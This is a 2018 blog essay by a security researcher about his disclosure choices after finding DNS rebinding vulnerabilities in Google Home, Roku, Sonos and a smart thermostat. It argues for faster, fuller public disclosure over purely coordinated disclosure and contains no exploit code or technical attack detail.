Going Public Fast: Thoughts on Disclosure Policy

Brannon Dorsey
7 min readJun 19, 2018

--

Today, I’m publishing my first official security advisory. I’ve spent the past three months exploring DNS rebinding; learning about it, writing tools to exploit it, and discovering vulnerabilities in IoT devices and services that can be targeted with it. That research lead me to discover vulnerabilities in a slew of home entertainment and automation devices, including Google Home, Roku, Sonos Wi-Fi speakers, and a 🌡️ “smart” thermostat. Like all independent security researchers before me, with the discovery of vulnerabilities that affect millions of users, comes a great responsibility. I was faced with a decision to make and found myself in search of my disclosure policy.

How would I share the information that I had discovered with the parties that it most affected and with the public?

Should I privately disclose the information to each vendor independently through coordinated disclosure, waiting patiently until they patched their systems before speaking about the bugs publicly, or does the public deserve the information as quickly as possible, and I should instead opt for full disclosure? After weeks of consideration, back-and-forth with vendors and confidants in the security communities that I frequent, I opted for something sort of in-between. I want to share my experience with this disclosure because it was one that I’ve struggled to arrive at. I couldn’t help but feel that I was going against the grain with the thoughts and feelings throughout the process and my hope is that a recount of my experience may be helpful to those who have also experienced this. Or that it will be useful to those who don’t yet have a dog in this race but, for one reason or another, will soon.

Before we enter the belly of the coordinated disclosure vs full disclosure vs some-nebulous-combination-of-the-two disclosure, beast I want to make it clear that when I first began to discover these vulnerabilities, it did not seem like I had a choice in the matter at all. From my experience as a researcher participating in the hacker community primarily from the sidelines, the professional security folks seemed to have already cemented their favor for responsible disclosure as the standard policy. Before you go yelling at me for throwing yet another disclosure term at you, I want to clarify that responsible disclosure is coordinated disclosure. This synonymity reveals something very interesting about my experience of the one-sidedness of the disclosure policy debate. It’s a name that I particularly dislike and refuse to use, as it implies that anything other than responsible disclosure is inherently irresponsible. In my experience going to security conferences and participating in infosec Twitter, coordinated disclosure is the only publicly supported disclosure practice. I don’t mean to say that there aren’t proponents of alternative policies, but their presence is sparse enough that in my three years in the community, coordinated disclosure seemed like the default. So much so that as I began to consider full disclosure, I feared (and still fear) social backlash.

Naturally, as I discovered vulnerabilities during my research I did what the industry had taught me and I contacted the vendors of the devices. One at a time, I used online disclosure forms and both plaintext and PGP-encrypted email to report the vulnerabilities depending on the vendor’s preferred method of notification. To their credit, Sonos was quick to respond, receptive to my report, and began working on a patch immediately. Roku took a bit more convincing but after I described a detailed attack scenario they said they had stalled an update to RokuOS 8.1 to investigate the bug and expected a patch to be released in three to four months. To my surprise, Google was completely unresponsive to my report. I submitted my findings through their official bug bounty form twice over two weeks but never heard anything from them. Unsurprisingly, the small Radio Thermostat Company of America didn’t reply to any of my emails.

As weeks passed, I began to think more about the the situation I was engaged with. What role was I playing and what were the dynamics of the relationship with these vendors and the general public? Was I serving the companies themselves or the consumers that were affected by their negligence to defend against a ten-year-old vulnerability? What was the nature of the exchange?

I couldn’t help but feel that the process I was engaged in was flawed. I had conducted the research, found the vulnerabilities, notified the vendors and was now at the mercy of their response, or lack thereof. By playing by the rules, the vendors were in a comfortable position to control the information, their response to it, and in-turn the public’s response. Bountyless coordinated disclosure has created a status quo that leverages independent security research as a form of free labor. Researchers find vulnerabilities, deliver them to vendors on a silver platter, and are then subject to their response. If and when the company fixes the problem they have the opportunity to announce the update as a dedication to security and celebration of collaboration. At best this is a PR success or at least the opportunity to shove bad PR under the rug as the security advisor gets published only after a patch has been released. I hate to say it, but it’s hard to get the public riled up about something that no longer effects them.

I couldn’t help but return to the thought that the modern coordinated disclosure model turns bad security into positive PR. Positive PR and security advisories that celebrate years of negligence under guise of “swift response,” which keep public outrage at bay. If more noise was made about smart toaster vulnerabilities, consumers would probably think twice before buying a smart toaster, and smart toaster companies would have to build security into their business model.

In his essay on the subject, Bruce Schneier makes a claim for full disclosure.

Full disclosure — the practice of making the details of security vulnerabilities public — is a damned good idea. Public scrutiny is the only reliable way to improve security, while secrecy only makes us less secure

I was a kid during the 90’s, the “golden years” of hacking when the debate between full disclosure and coordinated disclosure seemed to have hit its peak. It was news to me that full disclosure used to be the norm and that coordinated disclosure emerged almost as a response to challenge this norm. According to Schneier, coordinated disclosure can exist only because of the threat of full disclosure.

This rationale made a lot of sense to me and so as I decided to borrow from it in my own experience with Roku. After being told that Roku would likely not have a patch for several months, I sent their security team an email indicating that I was working with a WIRED reporter and that we were leaning towards publishing the research publicly sooner rather than later, and that we may choose to proceed with full disclosure. The next morning I received notification that Roku had begun rolling out a patch to over 20 million devices in a firmware upgrade. If that isn’t a proponent for the success of full disclosure, or at least the threat of it, I don’t know what is.

I want to make very clear that my proponent to more frequently engaging in full disclosure policies is not made lightly, nor recklessly. The choice of choosing a disclosure policy is situational and I’d argue that it can be fluid. My findings around DNS rebinding are a great time to favor its use, because vulnerability to this type of attack is a systemic problem and one that has been known for over a decade. With the IoT devices that I was targeting, the vulnerabilities lead to information leakage, denial of service, and rick-roll style tomfoolery. It was the combination of these factors; weakness to a ten-year-old attack, limited damages, potentially thousands of unique products that are vulnerable, and the initial response from a few vendors, that lead me to transition from an initial policy of coordinated disclosure towards one that looks more like the full disclosure policies of ages past.

Different classes of vulnerabilities may deserve different disclosure policies, some of which may not fit into the cookie cutter mold we’ve created to talk about them. Take for example the great 2008 DNS cache vulnerability revaluations. Dan Kaminsky and a great many engineers worked to successfully control the information and patch a flawed DNS spec. Had that disclosure been handled differently millions of people could have had their bank accounts emptied.

Where I’m going with all of this is that I want to make it clear that researchers have a choice in how they disclose the information they discover, and great influence that comes with that choice. They can maintain agency and autonomy in an exchange that is often delicate, consequential, and selfless. They can exercise a duty to the public in a way that may inconvenience a vendor or challenge the coordinated disclosure practices and norms of today, and that’s OK.

Systemic security problems like DNS rebinding aren’t going to be solved by independently approaching hundreds of companies and wrestling them into patching. They’ll be solved by raising awareness of the attack vector at large and educating developers about the problem so that the next ten years of products won’t have the same problems of the last ten. That’s why, at least in this case, I’ve opted to publish my research in the open with particular emphasis on documentation, examples, and resources, and to publish it fast!

--

--